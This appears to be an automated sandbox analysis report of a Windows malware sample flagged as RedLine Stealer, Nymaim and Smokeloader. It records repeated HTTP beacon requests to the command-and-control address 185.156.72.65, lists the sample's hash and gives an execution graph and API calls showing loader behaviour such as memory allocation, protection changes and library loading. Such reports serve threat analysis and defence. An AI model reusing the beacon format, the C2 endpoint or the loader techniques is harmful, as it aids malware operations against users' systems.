                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:53:40.834578037 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.450010185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:54:06.029354095 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.450011185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:54:31.021220922 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.450012185.156.72.65805796C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Nov 30, 2024 13:54:51.991610050 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  System Behavior

                  General

                  Target ID:0
                  Start time:07:50:54
                  Start date:30/11/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x400000
                  File size:2'029'568 bytes
                  MD5 hash:C54023B84D77E5CE72A48EDA24BBC227
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1656980225.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:false

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:1.6%
                    Dynamic/Decrypted Code Coverage:5.3%
                    Signature Coverage:3.5%
                    Total number of Nodes:566
                    Total number of Limit Nodes:5
                    execution_graph 29450 40a0b1 29451 40a0bd __FrameHandler3::FrameUnwindToState 29450->29451 29478 409e11 29451->29478 29453 40a0c4 29454 40a217 29453->29454 29464 40a0ee ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 29453->29464 29505 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _unexpected 29454->29505 29456 40a21e 29506 4106ab 21 API calls _unexpected 29456->29506 29458 40a224 29507 41066f 21 API calls _unexpected 29458->29507 29460 40a22c 29461 40a10d 29464->29461 29468 40a18e 29464->29468 29504 410685 39 API calls 3 library calls 29464->29504 29486 40a6a5 29468->29486 29479 409e1a 29478->29479 29508 40a2ec IsProcessorFeaturePresent 29479->29508 29481 409e26 29509 40b77d 10 API calls 2 library calls 29481->29509 29483 409e2b 29484 409e2f 29483->29484 29510 40b79c 7 API calls 2 library calls 29483->29510 29484->29453 29511 40b570 29486->29511 29488 40a6b8 GetStartupInfoW 29489 40a194 29488->29489 29490 412288 29489->29490 29513 41816d 29490->29513 29492 412291 29493 40a19c 29492->29493 29519 41841d 39 API calls 29492->29519 29495 4087e0 29493->29495 29522 402460 29495->29522 29498 402460 43 API calls 29499 408807 29498->29499 29526 405a50 29499->29526 29504->29468 29505->29456 29506->29458 29507->29460 29508->29481 29509->29483 29510->29484 29512 40b587 29511->29512 29512->29488 29512->29512 29514 4181a8 29513->29514 29515 418176 29513->29515 29514->29492 29520 41299d 39 API calls 3 library calls 29515->29520 29517 418199 29521 417f78 49 API calls 3 library calls 29517->29521 29519->29492 29520->29517 29521->29514 29523 402483 29522->29523 29523->29523 29841 402760 29523->29841 29525 402495 29525->29498 29868 410822 GetSystemTimeAsFileTime 29526->29868 29528 405a9f 29870 4106e2 29528->29870 29531 402760 43 API calls 29532 405ada 29531->29532 29533 402760 43 API calls 29532->29533 29534 405ca0 29533->29534 29873 403ab0 29534->29873 29536 405e9f 29885 406c40 29536->29885 29538 40620c 29539 402460 43 API calls 29538->29539 29540 40621c 29539->29540 29895 402390 29540->29895 29542 406230 29903 406ee0 29542->29903 29544 40630a 29545 402460 43 API calls 29544->29545 29546 40631a 29545->29546 29547 402390 39 API calls 29546->29547 29548 40632e 29547->29548 29549 406404 29548->29549 29550 406336 29548->29550 29966 407290 53 API calls 2 library calls 29549->29966 29958 406f60 53 API calls 2 library calls 29550->29958 29553 406409 29556 402460 43 API calls 29553->29556 29554 40633b 29555 402460 43 API calls 29554->29555 29557 40634b 29555->29557 29558 406419 29556->29558 29959 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29557->29959 29562 402390 39 API calls 29558->29562 29560 406354 29561 402390 39 API calls 29560->29561 29563 40635c 29561->29563 29564 40642d 29562->29564 29960 406ff0 53 API calls 2 library calls 29563->29960 29719 4064ee 29564->29719 29967 407310 53 API calls 2 library calls 29564->29967 29566 406361 29571 402460 43 API calls 29566->29571 29569 40643a 29572 402460 43 API calls 29569->29572 29570 4064f8 29573 402460 43 API calls 29570->29573 29574 406371 29571->29574 29575 40644a 29572->29575 29576 406508 29573->29576 29961 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29574->29961 29968 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29575->29968 29584 402390 39 API calls 29576->29584 29579 40637a 29580 402390 39 API calls 29579->29580 29582 406382 29580->29582 29581 406453 29583 402390 39 API calls 29581->29583 29962 407070 53 API calls 2 library calls 29582->29962 29586 40645b 29583->29586 29587 40651c 29584->29587 29969 407390 53 API calls 2 library calls 29586->29969 29799 406603 29587->29799 29976 4076b0 53 API calls 2 library calls 29587->29976 29588 406387 29595 402460 43 API calls 29588->29595 29591 406460 29597 402460 43 API calls 29591->29597 29593 40660d 29598 402460 43 API calls 29593->29598 29594 406529 29600 402460 43 API calls 29594->29600 29596 406397 29595->29596 29604 402390 39 API calls 29596->29604 29599 406470 29597->29599 29601 40661d 29598->29601 29970 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29599->29970 29603 406539 29600->29603 29614 402390 39 API calls 29601->29614 29977 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29603->29977 29608 4063ab 29604->29608 29605 406479 29609 402390 39 API calls 29605->29609 29607 406542 29611 402390 39 API calls 29607->29611 29612 4063cc 29608->29612 29613 4063af 29608->29613 29610 406481 29609->29610 29971 407410 53 API calls 2 library calls 29610->29971 29616 40654a 29611->29616 29964 407180 53 API calls 2 library calls 29612->29964 29963 407100 53 API calls 2 library calls 29613->29963 29619 406631 29614->29619 29978 407730 53 API calls 2 library calls 29616->29978 29623 4066b3 29619->29623 29624 406635 29619->29624 29620 406486 29629 402460 43 API calls 29620->29629 29622 4063d1 29631 402460 43 API calls 29622->29631 29993 407c70 53 API calls 2 library calls 29623->29993 29987 407ae0 53 API calls 2 library calls 29624->29987 29627 4063b4 29628 402460 43 API calls 29627->29628 29632 4063c4 29628->29632 29635 406496 29629->29635 29630 40654f 29636 402460 43 API calls 29630->29636 29637 4063e1 29631->29637 30012 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29632->30012 29633 4066b8 29638 402460 43 API calls 29633->29638 29634 40663a 29639 402460 43 API calls 29634->29639 29647 402390 39 API calls 29635->29647 29640 40655f 29636->29640 29649 402390 39 API calls 29637->29649 29642 4066c8 29638->29642 29643 40664a 29639->29643 29979 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29640->29979 29656 402390 39 API calls 29642->29656 29988 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29643->29988 29645 406875 29650 402390 39 API calls 29645->29650 29652 4064aa 29647->29652 29648 406568 29653 402390 39 API calls 29648->29653 29654 4063f5 29649->29654 29655 4066a7 29650->29655 29651 406653 29657 402390 39 API calls 29651->29657 29658 4064b8 29652->29658 29659 4064ae 29652->29659 29660 406570 29653->29660 29654->29655 29965 407210 53 API calls 2 library calls 29654->29965 29913 4017a0 29655->29913 29661 4066dc 29656->29661 29662 40665b 29657->29662 29973 407520 53 API calls 2 library calls 29658->29973 29972 4074a0 53 API calls 2 library calls 29659->29972 29980 4077b0 53 API calls 2 library calls 29660->29980 29669 4066e0 29661->29669 29670 40675e 29661->29670 29989 407b60 53 API calls 2 library calls 29662->29989 29667 4064bd 29681 402460 43 API calls 29667->29681 29994 407d00 53 API calls 2 library calls 29669->29994 30000 407e80 53 API calls 2 library calls 29670->30000 29672 406575 29680 402460 43 API calls 29672->29680 29673 4068a1 29917 4083f0 29673->29917 29676 406660 29685 402460 43 API calls 29676->29685 29678 406763 29687 402460 43 API calls 29678->29687 29679 4066e5 29688 402460 43 API calls 29679->29688 29683 406585 29680->29683 29684 4064cd 29681->29684 29682 4068aa 29692 402460 43 API calls 29682->29692 29981 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29683->29981 29698 402390 39 API calls 29684->29698 29689 406670 29685->29689 29693 406773 29687->29693 29694 4066f5 29688->29694 29990 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29689->29990 29691 40658e 29697 402390 39 API calls 29691->29697 29699 4068bd 29692->29699 29705 402390 39 API calls 29693->29705 29995 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29694->29995 29696 406679 29701 402390 39 API calls 29696->29701 29702 406596 29697->29702 29703 4064e1 29698->29703 29927 408370 29699->29927 29700 4066fe 29706 402390 39 API calls 29700->29706 29707 406681 29701->29707 29982 407830 53 API calls 2 library calls 29702->29982 29703->29655 29974 4075b0 53 API calls 2 library calls 29703->29974 29710 406787 29705->29710 29711 406706 29706->29711 29991 407bf0 53 API calls 2 library calls 29707->29991 29709 4068c8 29720 402460 43 API calls 29709->29720 29715 40678b 29710->29715 29716 4067de 29710->29716 29996 407d80 53 API calls 2 library calls 29711->29996 29713 40659b 29726 402460 43 API calls 29713->29726 30001 407f10 53 API calls 2 library calls 29715->30001 30006 4080d0 53 API calls 2 library calls 29716->30006 29718 406686 29729 402460 43 API calls 29718->29729 29975 407630 53 API calls 2 library calls 29719->29975 29724 4068db 29720->29724 29722 40670b 29732 402460 43 API calls 29722->29732 29937 4082d0 29724->29937 29725 406790 29734 402460 43 API calls 29725->29734 29730 4065ab 29726->29730 29727 4067e3 29737 402460 43 API calls 29727->29737 29733 406696 29729->29733 29742 402390 39 API calls 29730->29742 29731 4068e6 29744 402460 43 API calls 29731->29744 29735 40671b 29732->29735 29992 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29733->29992 29739 4067a0 29734->29739 29997 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29735->29997 29738 4067f3 29737->29738 29753 402390 39 API calls 29738->29753 30002 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29739->30002 29741 40669f 29747 402390 39 API calls 29741->29747 29743 4065bf 29742->29743 29748 4065c8 29743->29748 29983 4078c0 53 API calls 2 library calls 29743->29983 29749 4068f9 29744->29749 29746 406724 29751 402390 39 API calls 29746->29751 29747->29655 29984 407940 53 API calls 2 library calls 29748->29984 29947 408da0 29749->29947 29750 4067a9 29756 402390 39 API calls 29750->29756 29757 40672c 29751->29757 29758 406807 29753->29758 29761 4067b1 29756->29761 29998 407e00 53 API calls 2 library calls 29757->29998 29758->29655 30007 408150 53 API calls 2 library calls 29758->30007 29759 4065d2 29770 402460 43 API calls 29759->29770 30003 407fd0 53 API calls 2 library calls 29761->30003 29765 406731 29772 402460 43 API calls 29765->29772 29767 406926 29955 408eb0 29767->29955 29768 4067b6 29776 402460 43 API calls 29768->29776 29769 406810 29781 402460 43 API calls 29769->29781 29773 4065e2 29770->29773 29777 406741 29772->29777 29786 402390 39 API calls 29773->29786 29775 408e00 43 API calls 29778 406953 29775->29778 29779 4067c6 29776->29779 29999 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29777->29999 29782 408eb0 43 API calls 29778->29782 30004 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29779->30004 29785 406820 29781->29785 29787 406968 29782->29787 29784 40674a 29789 402390 39 API calls 29784->29789 30008 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29785->30008 29791 4065f6 29786->29791 29792 408e00 43 API calls 29787->29792 29788 4067cf 29793 402390 39 API calls 29788->29793 29789->29655 29791->29655 29985 4079d0 53 API calls 2 library calls 29791->29985 29796 406980 29792->29796 29797 4067d7 29793->29797 29794 406829 29798 402390 39 API calls 29794->29798 29800 402390 39 API calls 29796->29800 30005 408050 53 API calls 2 library calls 29797->30005 29802 406831 29798->29802 29986 407a50 53 API calls 2 library calls 29799->29986 29804 40698e 29800->29804 30009 4081d0 53 API calls 2 library calls 29802->30009 29806 402390 39 API calls 29804->29806 29805 406836 29810 402460 43 API calls 29805->29810 29807 406999 29806->29807 29808 402390 39 API calls 29807->29808 29811 4069a4 29808->29811 29809 4067dc 29812 402460 43 API calls 29809->29812 29813 406846 29810->29813 29814 402390 39 API calls 29811->29814 29812->29632 30010 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29813->30010 29816 4069af 29814->29816 29818 402390 39 API calls 29816->29818 29817 40684f 29819 402390 39 API calls 29817->29819 29820 4069ba 29818->29820 29822 406857 29819->29822 29821 402390 39 API calls 29820->29821 29823 4069c5 29821->29823 30011 408250 53 API calls 2 library calls 29822->30011 29825 402390 39 API calls 29823->29825 29826 4069d0 29825->29826 29827 402390 39 API calls 29826->29827 29830 4069df 29827->29830 29828 406a3e Sleep 29828->29830 29829 402460 43 API calls 29829->29830 29830->29828 29830->29829 29831 406a47 29830->29831 29832 402390 39 API calls 29831->29832 29833 406a4f 29832->29833 30013 408c80 43 API calls 2 library calls 29833->30013 29835 406a60 30014 408c80 43 API calls 2 library calls 29835->30014 29837 406a79 30015 408c80 43 API calls 2 library calls 29837->30015 29839 406a8c 30016 404f70 130 API calls 6 library calls 29839->30016 29842 402830 29841->29842 29844 40277f 29841->29844 29859 401600 43 API calls 3 library calls 29842->29859 29845 40278b __InternalCxxFrameHandler 29844->29845 29846 4027b3 29844->29846 29849 4027f7 29844->29849 29850 4027ee 29844->29850 29845->29525 29857 401560 41 API calls 3 library calls 29846->29857 29847 402835 29860 401560 41 API calls 2 library calls 29847->29860 29856 4027cf __InternalCxxFrameHandler 29849->29856 29858 401560 41 API calls 3 library calls 29849->29858 29850->29846 29850->29847 29852 4027c6 29852->29856 29861 40cfef 29852->29861 29856->29525 29857->29852 29858->29856 29859->29847 29860->29852 29866 40cf2b 39 API calls ___std_exception_copy 29861->29866 29863 40cffe 29867 40d00c 11 API calls _unexpected 29863->29867 29865 40d00b 29866->29863 29867->29865 29869 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 29868->29869 29869->29528 30017 4128e2 GetLastError 29870->30017 29874 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29873->29874 29876 403b75 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29874->29876 29882 403c37 29874->29882 30063 408c80 43 API calls 2 library calls 29874->30063 29877 403bd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29876->29877 29876->29882 30064 408f80 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29876->30064 30056 409a17 29877->30056 29880 403c33 29880->29536 29881 403b8d 29881->29877 29881->29882 29883 40cfef 39 API calls 29882->29883 29884 403c3c 29883->29884 29886 406c9e 29885->29886 29887 406c6c 29885->29887 29888 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29886->29888 30066 409cc5 6 API calls 29887->30066 29890 406cb0 29888->29890 29890->29538 29891 406c76 29891->29886 30067 409fd7 42 API calls 29891->30067 29893 406c94 30068 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29893->30068 29896 40239b 29895->29896 29897 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29895->29897 29896->29897 29898 40cfef 39 API calls 29896->29898 29897->29542 29899 4023da 29898->29899 29900 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29899->29900 29901 40cfef 39 API calls 29899->29901 29900->29542 29902 40245c 29901->29902 29904 406f48 29903->29904 29905 406f0e 29903->29905 29907 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29904->29907 30069 409cc5 6 API calls 29905->30069 29909 406f5b 29907->29909 29908 406f18 29908->29904 30070 409fd7 42 API calls 29908->30070 29909->29544 29911 406f3e 30071 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29911->30071 29914 4017b3 _unexpected 29913->29914 30072 409b8a 29914->30072 29916 4017ca _unexpected 29916->29673 29918 40845e 29917->29918 29919 408422 29917->29919 29920 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29918->29920 30099 409cc5 6 API calls 29919->30099 29922 408470 29920->29922 29922->29682 29923 40842c 29923->29918 30100 409fd7 42 API calls 29923->30100 29925 408454 30101 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29925->30101 29928 40839c 29927->29928 29936 4083ce 29927->29936 30102 409cc5 6 API calls 29928->30102 29930 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29931 4083e0 29930->29931 29931->29709 29932 4083a6 29932->29936 30103 409fd7 42 API calls 29932->30103 29934 4083c4 30104 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29934->30104 29936->29930 29938 408352 29937->29938 29939 40830d 29937->29939 29941 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29938->29941 30105 409cc5 6 API calls 29939->30105 29942 408365 29941->29942 29942->29731 29943 408317 29943->29938 30106 409fd7 42 API calls 29943->30106 29945 408348 30107 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29945->30107 29948 408db4 29947->29948 30108 409310 29948->30108 29950 40690e 29951 408e00 29950->29951 29952 408e1b 29951->29952 29954 408e2f __InternalCxxFrameHandler 29952->29954 30114 402840 43 API calls 3 library calls 29952->30114 29954->29767 30115 409130 29955->30115 29957 40693b 29957->29775 29958->29554 29959->29560 29960->29566 29961->29579 29962->29588 29963->29627 29964->29622 29965->29627 29966->29553 29967->29569 29968->29581 29969->29591 29970->29605 29971->29620 29972->29627 29973->29667 29974->29719 29975->29570 29976->29594 29977->29607 29978->29630 29979->29648 29980->29672 29981->29691 29982->29713 29983->29748 29984->29759 29985->29799 29986->29593 29987->29634 29988->29651 29989->29676 29990->29696 29991->29718 29992->29741 29993->29633 29994->29679 29995->29700 29996->29722 29997->29746 29998->29765 29999->29784 30000->29678 30001->29725 30002->29750 30003->29768 30004->29788 30005->29809 30006->29727 30007->29769 30008->29794 30009->29805 30010->29817 30011->29809 30012->29645 30013->29835 30014->29837 30015->29839 30018 4128fe 30017->30018 30019 4128f8 30017->30019 30023 412902 30018->30023 30047 4135e5 6 API calls __dosmaperr 30018->30047 30046 4135a6 6 API calls __dosmaperr 30019->30046 30022 41291a 30022->30023 30024 412922 30022->30024 30025 412987 SetLastError 30023->30025 30048 413294 14 API calls __dosmaperr 30024->30048 30028 405aa8 Sleep 30025->30028 30029 412997 30025->30029 30027 41292f 30031 412937 30027->30031 30032 412948 30027->30032 30028->29531 30055 411109 39 API calls _unexpected 30029->30055 30049 4135e5 6 API calls __dosmaperr 30031->30049 30050 4135e5 6 API calls __dosmaperr 30032->30050 30036 412954 30038 412958 30036->30038 30039 41296f 30036->30039 30037 412945 30052 4132f1 14 API calls __dosmaperr 30037->30052 30051 4135e5 6 API calls __dosmaperr 30038->30051 30053 412710 14 API calls __dosmaperr 30039->30053 30043 41296c 30043->30025 30044 41297a 30054 4132f1 14 API calls __dosmaperr 30044->30054 30046->30018 30047->30022 30048->30027 30049->30037 30050->30036 30051->30037 30052->30043 30053->30044 30054->30043 30057 409a20 IsProcessorFeaturePresent 30056->30057 30058 409a1f 30056->30058 30060 409a67 30057->30060 30058->29880 30065 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30060->30065 30062 409b4a 30062->29880 30063->29874 30064->29881 30065->30062 30066->29891 30067->29893 30068->29886 30069->29908 30070->29911 30071->29904 30074 409b4c 30072->30074 30075 409b6b 30074->30075 30077 409b6d 30074->30077 30086 40fb4d 30074->30086 30095 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 30074->30095 30075->29916 30078 401560 Concurrency::cancel_current_task 30077->30078 30079 409b77 30077->30079 30093 40af80 RaiseException 30078->30093 30096 40af80 RaiseException 30079->30096 30082 40157c 30094 40ad31 40 API calls 2 library calls 30082->30094 30083 40a589 30085 4015a3 30085->29916 30091 413cb9 __dosmaperr 30086->30091 30087 413cf7 30098 40d0dd 14 API calls __dosmaperr 30087->30098 30089 413ce2 RtlAllocateHeap 30090 413cf5 30089->30090 30089->30091 30090->30074 30091->30087 30091->30089 30097 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 30091->30097 30093->30082 30094->30085 30095->30074 30096->30083 30097->30091 30098->30090 30099->29923 30100->29925 30101->29918 30102->29932 30103->29934 30104->29936 30105->29943 30106->29945 30107->29938 30109 409398 30108->30109 30112 40932a __InternalCxxFrameHandler 30108->30112 30113 4095d0 43 API calls 4 library calls 30109->30113 30111 4093aa 30111->29950 30112->29950 30113->30111 30114->29954 30116 409173 30115->30116 30117 4092fd 30116->30117 30118 40923d 30116->30118 30126 409178 __InternalCxxFrameHandler 30116->30126 30134 401600 43 API calls 3 library calls 30117->30134 30121 409272 30118->30121 30122 409298 30118->30122 30120 409302 30135 401560 41 API calls 2 library calls 30120->30135 30121->30120 30124 40927d 30121->30124 30131 40928a __InternalCxxFrameHandler 30122->30131 30133 401560 41 API calls 3 library calls 30122->30133 30132 401560 41 API calls 3 library calls 30124->30132 30125 409283 30129 40cfef 39 API calls 30125->30129 30125->30131 30126->29957 30130 40930c 30129->30130 30131->29957 30132->30125 30133->30131 30134->30120 30135->30125 30136 605df2 30137 607ca4 LoadLibraryA 30136->30137 30139 609654 30137->30139 30140 706fc3 Sleep 30141 707012 30140->30141 30142 47a7cb9 30145 47a7cc4 30142->30145 30146 47a7cd3 30145->30146 30149 47a8464 30146->30149 30151 47a847f 30149->30151 30150 47a8488 CreateToolhelp32Snapshot 30150->30151 30152 47a84a4 Module32First 30150->30152 30151->30150 30151->30152 30153 47a7cc3 30152->30153 30154 47a84b3 30152->30154 30156 47a8123 30154->30156 30157 47a814e 30156->30157 30158 47a8197 30157->30158 30159 47a815f VirtualAlloc 30157->30159 30158->30158 30159->30158 30160 706888 VirtualProtect 30161 7068a9 30160->30161 30162 495003c 30163 4950049 30162->30163 30164 495004c 30162->30164 30178 4950e0f SetErrorMode SetErrorMode 30164->30178 30169 4950265 30170 49502ce VirtualProtect 30169->30170 30171 495030b 30170->30171 30172 4950439 VirtualFree 30171->30172 30176 49505f4 LoadLibraryA 30172->30176 30177 49504be 30172->30177 30173 49504e3 LoadLibraryA 30173->30177 30175 49508c7 30176->30175 30177->30173 30177->30176 30179 4950223 30178->30179 30180 4950d90 30179->30180 30181 4950dad 30180->30181 30182 4950dbb GetPEB 30181->30182 30183 4950238 VirtualAlloc 30181->30183 30182->30183 30183->30169 30184 606b4b 30185 60a846 30184->30185 30186 60a8d4 RegOpenKeyA 30185->30186 30187 60a8fb RegOpenKeyA 30185->30187 30186->30187 30188 60a8f1 30186->30188 30189 60a918 30187->30189 30188->30187 30190 60a95c GetNativeSystemInfo 30189->30190 30191 608982 30189->30191 30190->30191

                    Executed Functions

                    Function 00403D40 Relevance: 57.8, APIs: 25, Strings: 7, Instructions: 1839sleepcomCOMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathA.KERNEL32(00000104,?,73BDA22C,74DF0F00,00000000), ref: 00403DAA
                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                    • Sleep.KERNEL32(000003E8), ref: 00403F42
                    • __Init_thread_footer.LIBCMT ref: 00404517
                    • __Init_thread_footer.LIBCMT ref: 004046DD
                    • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                    • __Init_thread_footer.LIBCMT ref: 00404975
                    • __Init_thread_footer.LIBCMT ref: 00404BDE
                    • CoInitialize.OLE32(00000000), ref: 00404C5F
                    • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                    • __Init_thread_footer.LIBCMT ref: 004050DD
                    • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                    • __Init_thread_footer.LIBCMT ref: 004053EB
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,73BDA22C), ref: 00410837
                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                    • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                    • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                    • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                    • __Init_thread_footer.LIBCMT ref: 00404046
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                      • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                      • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                    • __Init_thread_footer.LIBCMT ref: 00404222
